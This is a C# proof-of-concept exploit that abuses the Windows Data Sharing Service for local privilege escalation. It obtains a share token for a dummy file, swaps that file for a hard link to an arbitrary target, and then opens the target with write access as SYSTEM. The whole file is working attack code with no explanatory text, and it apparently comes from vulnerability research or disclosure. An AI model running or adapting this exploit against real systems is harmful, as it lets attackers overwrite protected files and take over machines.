﻿using DataSharingServiceCommon;
using Microsoft.Win32.SafeHandles;
using NtApiDotNet;
using System;
using System.IO;

namespace PoC_DSSVC_OpenFileAsSystem_EoP
{
    class Program
    {
        static void Main(string[] args)
        {
            try
            {
                if (args.Length < 1)
                {
                    throw new Exception("Usage: specify path to open for write access.");
                }

                string path = Path.GetFullPath(args[0]);
                string dummy_dir = Path.Combine(Path.GetPathRoot(path), Guid.NewGuid().ToString());

                Directory.CreateDirectory(dummy_dir);
                Console.WriteLine("Created dummy directory {0}", dummy_dir);

                string dummy_path = Path.Combine(dummy_dir, "dummy.txt");
                File.WriteAllText(dummy_path, string.Empty);

                DS_SHARE_ACCESS_CONTROL access_control = new DS_SHARE_ACCESS_CONTROL();
                access_control.SharePermission = DS_SHARE_PERMISSION.ReadWrite;
                Api.DSCreateSharedFileToken(dummy_path, access_control, DS_TOKEN_LIFETIME_TYPE.Type0, DS_TOKEN_USAGE.Type0, out string token).Check();
                Console.WriteLine("Token: {0}", token);

                File.Delete(dummy_path);
                using (var file = NtFile.Open(NtFileUtils.DosFileNameToNt(path), null, FileAccessRights.Synchronize))
                {
                    file.CreateHardlink(NtFileUtils.DosFileNameToNt(dummy_path));
                }

                Api.DSOpenSharedFile(token, DS_OPEN_FLAGS.None, out SafeFileHandle handle).Check();
                using (handle)
                {
                    Console.WriteLine("Opened handle {0}", handle.DangerousGetHandle());
                    NtFile file = NtFile.FromHandle(handle.DangerousGetHandle(), false);
                    Console.WriteLine("Links");
                    foreach (var link in file.GetHardLinks())
                    {
                        Console.WriteLine(link.FullPath);
                    }
                    Console.WriteLine("Granted Access: {0}", file.GrantedAccess);
                }
                Console.WriteLine("Done");
            }
            catch (Exception ex)
            {
                Console.WriteLine(ex);
            }
        }
    }
}
